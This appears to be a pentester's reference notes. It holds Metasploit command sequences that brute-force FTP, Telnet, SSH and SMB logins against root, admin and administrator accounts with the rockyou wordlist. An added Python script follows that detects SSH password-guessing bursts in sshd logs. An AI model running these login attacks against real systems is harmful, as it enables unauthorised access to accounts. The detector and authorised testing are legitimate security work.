The modules we use are specific to our needs, but these are the ones I have used most often in my recent history. This list is super generic and mostly here to supplement my poor memory.
These methods/modules rely on a previously completed db_nmap scan, so our targets are readily available from the database rather than having to be scanned for now. The ‘rockyou’ password list can be found here: “https://gitlab.com/kalilinux/packages/wordlists/-/raw/kali/master/rockyou.txt.gz”.
Scan for and attack Anonymous FTP:
use auxiliary/scanner/ftp/anonymous
services -p 21 -u -R
set THREADS 30
spool console-ftpa.log
run
Scan for and attack FTP using the ‘admin’ user:
use auxiliary/scanner/ftp/ftp_login
services -p 21 -u -R
set THREADS 30
set PASS_FILE ./rockyou.txt
set USERNAME admin
spool console-ftp.log
run
Scan for and attack Telnet using the ‘admin’ user:
use auxiliary/scanner/telnet/telnet_login
services -p 23 -u -R
set THREADS 30
set PASS_FILE ./rockyou.txt
set USERNAME admin
spool console-tel.log
run
Scan for and attack SSH using the ‘root’ user:
use auxiliary/scanner/ssh/ssh_login
services -p 22 -u -R
set THREADS 30
set PASS_FILE ./rockyou.txt
set USERNAME root
spool console-ssh.log
run
Scan for and attack SMB using the ‘administrator’ user:
use auxiliary/scanner/smb/smb_login
services -p 445 -u -R
set THREADS 30
set PASS_FILE ./rockyou.txt
set SMBUser administrator
spool console-smb.log
run
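
A password-list run against a single account, such as the SSH ‘root’ run above, appears in the target's sshd log as a burst of failed passwords for one user from one source. The following is an added example, not part of the original notes, that flags that pattern in OpenSSH syslog lines; the sample log lines are constructed, and the threshold, window and year values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH "Failed password" line as written to auth.log / secure (syslog format).
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\ssshd\[\d+\]:\s"
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def find_guessing(lines, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return {(src, user): count} for every source that produced at least
    `threshold` failed passwords for one user inside `window`.
    threshold, window and year are assumed values; tune them to the site."""
    events = defaultdict(list)
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue
        # Classic syslog timestamps carry no year, so one is supplied.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events[(m["src"], m["user"])].append(ts)

    flagged = {}
    for key, stamps in events.items():
        stamps.sort()
        start = 0
        best = 0
        for end, ts in enumerate(stamps):
            # Advance the window start until the span fits inside `window`.
            while ts - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[key] = best
    return flagged

# Constructed sample: one source guessing 'root', plus a user's single typo.
SAMPLE = [
    f"Mar  3 10:15:{s:02d} host1 sshd[{4000 + s}]: Failed password for root "
    f"from 192.0.2.10 port {50000 + s} ssh2"
    for s in range(0, 12, 2)
] + [
    "Mar  3 10:16:40 host1 sshd[4100]: Failed password for alice from 198.51.100.7 port 40122 ssh2",
    "Mar  3 10:16:52 host1 sshd[4101]: Accepted password for alice from 198.51.100.7 port 40123 ssh2",
]

if __name__ == "__main__":
    for (src, user), n in find_guessing(SAMPLE).items():
        print(f"{src} -> {user}: {n} failed passwords within 60s")
```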